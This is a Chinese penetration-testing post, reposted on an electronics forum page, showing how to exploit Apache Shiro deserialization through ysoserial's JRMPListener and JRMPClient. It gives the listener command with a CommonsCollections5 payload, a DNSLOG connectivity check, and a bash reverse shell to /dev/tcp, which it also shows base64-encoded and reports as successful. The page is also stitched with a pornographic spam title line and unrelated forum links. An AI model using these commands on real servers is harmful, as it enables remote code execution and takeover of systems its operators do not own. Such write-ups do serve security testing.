色哟哟视频在线观看-色哟哟视频在线-色哟哟欧美15最新在线-色哟哟免费在线观看-国产l精品国产亚洲区在线观看-国产l精品国产亚洲区久久

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

使用JRMPClient模塊進行測試

jf_vLt34KHi ? 來源:Tide安全團隊 ? 作者:Tide安全團隊 ? 2022-11-22 17:22 ? 次閱讀

前言

最近在測試中遇到一些shiro反序列化不能利用的情況 找到key 無法找到利用鏈,但是發(fā)現(xiàn)存在JRMPClient可用的情況。

b2047198-6a45-11ed-8abf-dac502259ad0.png

換一種工具嘗試

b225dc20-6a45-11ed-8abf-dac502259ad0.png

發(fā)現(xiàn) JRMPClient 可用, 嘗試使用 JRMPClient 進行測試,最終這個目標也沒有執(zhí)行成功所以換了一個目標進行的嘗試,僅記錄JRMPClient 利用方式。

使用JRMPClient模塊進行測試

找到一個同樣存在shiro反序列的目標。

b237b030-6a45-11ed-8abf-dac502259ad0.png

同樣find: JRMPClient can be use。

搭建JRMPClient 監(jiān)聽服務(wù)

首先需要搭建 JRMPClient 使用ysoserial.jar 工具搭建服務(wù),下載地址:https://github.com/frohoff/ysoserial

使用DNSLOG進行檢測

在不確定目標是否通外網(wǎng)的情況下 先使用DNSLOG進行檢測 獲取一個新的域名 :w3dh1h.dnslog.cn

b24883f6-6a45-11ed-8abf-dac502259ad0.png

VPS上開啟JRMPListener

在VPS上搭建服務(wù)命令

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "ping w3dh1h.dnslog.cn"

b2716df2-6a45-11ed-8abf-dac502259ad0.png

shiro反序列利用工具中選擇JRMPClient,然后輸入VPS上搭建服務(wù)的地址:

b2887efc-6a45-11ed-8abf-dac502259ad0.png

JRMPListener 收到返回信息

b29c67e6-6a45-11ed-8abf-dac502259ad0.png

DNSLOG上收到目標的ping 命令信息 說明目標服務(wù)器通外網(wǎng)

b2b75fce-6a45-11ed-8abf-dac502259ad0.png

執(zhí)行反彈命令

執(zhí)行反彈命令 bash -i >& /dev/tcp/xxxxxx/8888 0>&1

b6ba1166-6a45-11ed-8abf-dac502259ad0.png

沒有收到反彈鏈接

b6db2266-6a45-11ed-8abf-dac502259ad0.png

將命令進行base64編碼 java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eHgvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"

b6f38aae-6a45-11ed-8abf-dac502259ad0.png

成功收到反彈鏈接

b72e021a-6a45-11ed-8abf-dac502259ad0.png

審核編輯:湯梓紅

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學習之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 模塊
    +關(guān)注

    關(guān)注

    7

    文章

    2722

    瀏覽量

    47572
  • key
    key
    +關(guān)注

    關(guān)注

    0

    文章

    49

    瀏覽量

    12828

原文標題:使用JRMPClient模塊進行測試

文章出處:【微信號:Tide安全團隊,微信公眾號:Tide安全團隊】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    電源模塊測試規(guī)范

    1、目的規(guī)范二次電源模塊測試方法。本測試規(guī)范包括二次電源模塊測試項目、測試目的、接線圖、
    發(fā)表于 11-09 10:03 ?83次下載

    怎樣對電源模塊進行可靠性測試

    電源作為電路系統(tǒng)的“心臟”,其重要性是顯而易見的。在選擇電源模塊時,除了要考慮輸入電壓范圍、額定功率、隔離耐壓、效率、紋波&噪聲等性能特性外,還需針對其高低溫性能和降額設(shè)計進行可靠性測試。
    的頭像 發(fā)表于 09-25 11:31 ?1.7w次閱讀
    怎樣對電源<b class='flag-5'>模塊</b><b class='flag-5'>進行</b>可靠性<b class='flag-5'>測試</b>

    電源模塊生產(chǎn)測試必備系統(tǒng)

    n 系統(tǒng)簡介 電源模塊作為電路系統(tǒng)的心臟,它的性能直接影響到整個電路系統(tǒng)的正常運行,因此電源模塊的產(chǎn)品性能就顯得格外重要,對于一款合格的電源模塊,需要進行多項性能參數(shù)的
    發(fā)表于 11-21 17:00 ?1728次閱讀
    電源<b class='flag-5'>模塊</b>生產(chǎn)<b class='flag-5'>測試</b>必備系統(tǒng)

    對光模塊進行測試的四大步驟

    模塊是由發(fā)射器和接收器組成。當發(fā)射器通過光纖與接收器連接時,如果整個系統(tǒng)的誤碼率沒有達到預(yù)期的效果,是發(fā)射器的問題還是接收器的問題?測試模塊一般分為4個步驟,主要分為對發(fā)射器和接收器的測試
    的頭像 發(fā)表于 12-25 16:27 ?2905次閱讀

    使用示波器對電源模塊進行紋波測量

      在電源模塊物料檢測和某些單板測試時,會使用示波器對電源模塊進行紋波測量,所以需要了解電源紋波的產(chǎn)生、危害,以及示波器各種探頭,用哪種探頭測試
    的頭像 發(fā)表于 01-12 16:35 ?8469次閱讀
    使用示波器對電源<b class='flag-5'>模塊</b><b class='flag-5'>進行</b>紋波測量

    使用TPT進行測試建模/測試設(shè)計

    TPT中的測試用例用信號特征和函數(shù)調(diào)用描述被測系統(tǒng)的刺激。您可以用連續(xù)的測試步驟對簡單的測試進行建模。對于更復雜的測試用例,TPT提供了混合
    的頭像 發(fā)表于 11-25 11:15 ?1045次閱讀
    使用TPT<b class='flag-5'>進行</b><b class='flag-5'>測試</b>建模/<b class='flag-5'>測試</b>設(shè)計

    聚焦千兆光模塊和萬兆光模塊測試技術(shù)及設(shè)備

    本文主要探討了千兆光模塊和萬兆光模塊測試技術(shù)及測試設(shè)備,讓讀者了解光模塊測試的具體方法。同時,
    的頭像 發(fā)表于 11-06 15:00 ?723次閱讀

    電源自動測試系統(tǒng)如何進行電源模塊測試

    電源自動測試系統(tǒng)如何進行電源模塊測試? 電源自動測試系統(tǒng)是用于對電源模塊
    的頭像 發(fā)表于 11-09 09:30 ?996次閱讀

    電源模塊耐壓測試的標準及其規(guī)范是什么?要如何測試?

    電源模塊耐壓測試的標準及其規(guī)范是什么?要如何測試? 電源模塊是電子設(shè)備中至關(guān)重要的部分,其耐壓測試是確保產(chǎn)品質(zhì)量和安全性的重要環(huán)節(jié)。在
    的頭像 發(fā)表于 11-10 14:22 ?4479次閱讀

    利用ADPD188BI光學煙霧和氣霧劑檢測模塊進行煙霧測試說明

    電子發(fā)燒友網(wǎng)站提供《利用ADPD188BI光學煙霧和氣霧劑檢測模塊進行煙霧測試說明.pdf》資料免費下載
    發(fā)表于 11-22 10:13 ?3次下載
    利用ADPD188BI光學煙霧和氣霧劑檢測<b class='flag-5'>模塊</b><b class='flag-5'>進行</b>煙霧<b class='flag-5'>測試</b>說明

    利用ADPD188BI光學煙霧和氣霧劑檢測模塊進行煙霧測試

    電子發(fā)燒友網(wǎng)站提供《利用ADPD188BI光學煙霧和氣霧劑檢測模塊進行煙霧測試.pdf》資料免費下載
    發(fā)表于 11-23 10:36 ?2次下載
    利用ADPD188BI光學煙霧和氣霧劑檢測<b class='flag-5'>模塊</b>來<b class='flag-5'>進行</b>煙霧<b class='flag-5'>測試</b>

    為什么要進行模塊測試?光模塊測試方案

    為什么要進行模塊測試?光模塊測試方案 光模塊測試
    的頭像 發(fā)表于 01-19 11:15 ?1467次閱讀

    如何測試模塊的性能?需要哪些測試測量設(shè)備?

    模塊是一種將電信號轉(zhuǎn)換為光信號或?qū)⒐庑盘栟D(zhuǎn)換為電信號的設(shè)備,它在光通信系統(tǒng)中起著重要的作用。為了保證光模塊的正常工作,我們需要對其進行性能測試,檢測其是否符合相關(guān)的標準和規(guī)范。那么,
    的頭像 發(fā)表于 01-30 09:03 ?6048次閱讀
    如何<b class='flag-5'>測試</b>光<b class='flag-5'>模塊</b>的性能?需要哪些<b class='flag-5'>測試</b>測量設(shè)備?

    什么是光模塊中的浪涌測試

    ,光模塊常常會遭受到來自外部環(huán)境的各種干擾,其中包括來自電力系統(tǒng)的浪涌電壓。因此,進行模塊浪涌測試對于確保其穩(wěn)定性和可靠性至關(guān)重要。 浪涌測試
    的頭像 發(fā)表于 01-31 14:24 ?770次閱讀

    電源模塊測試系統(tǒng)精準測量:揭秘納米軟件的測試技術(shù)

    電源測試系統(tǒng)是針對精密電源、開關(guān)電源、工業(yè)電源、軍品電源等多種電源模塊特性測試的ate自動化測試設(shè)備,旨在綜合檢測電源模塊性能,判斷電源是否
    的頭像 發(fā)表于 09-05 18:47 ?328次閱讀
    電源<b class='flag-5'>模塊</b><b class='flag-5'>測試</b>系統(tǒng)精準測量:揭秘納米軟件的<b class='flag-5'>測試</b>技術(shù)
    主站蜘蛛池模板: 久草精品视频| 2020亚洲色噜噜狠狠网站| 国产人成高清在线视频99| 最近中文字幕MV高清在线| 视频一区国产| 免费可以看黄的视频s色| 国产色婷婷亚洲99麻豆| jiz在线播放jizijzz| 伊人成色综合人网| 午夜福利体验试看120秒| 欧美老妇与zozoz0交| 久久91精品国产91久久户| 国产精品久久久久无码AV色戒| 99久久国产露脸精品竹菊传煤| 亚洲人成网站在线观看90影院| 试看做受120秒免费午夜剧场| 免费国产成人手机在线观看| 狠日狠干日曰射| 国产免国产免费| 成视频高清| wwwzzz日本| 99E久热只有精品8在线直播| 用震蛋调教女性下面视频| 亚洲免费一区| 小学生偷拍妈妈视频遭性教育| 日本wwwhdsex69| 欧美xxxav| 免费国产久久拍久久爱| 久久综合久久伊人| 久久99热这里只有精品66| 国模啪啪久久久久久久| 国产人妻麻豆蜜桃色精| 国产乱码精品AAAAAAAA| 闺蜜撬开我的腿用黄瓜折磨我| www.青青草.com| CHINA学生白嫩| av在线不卡中文网| porono日本xxx| 菠萝菠萝蜜高清观看在线| www.伊人| 成 人 片 免费播放|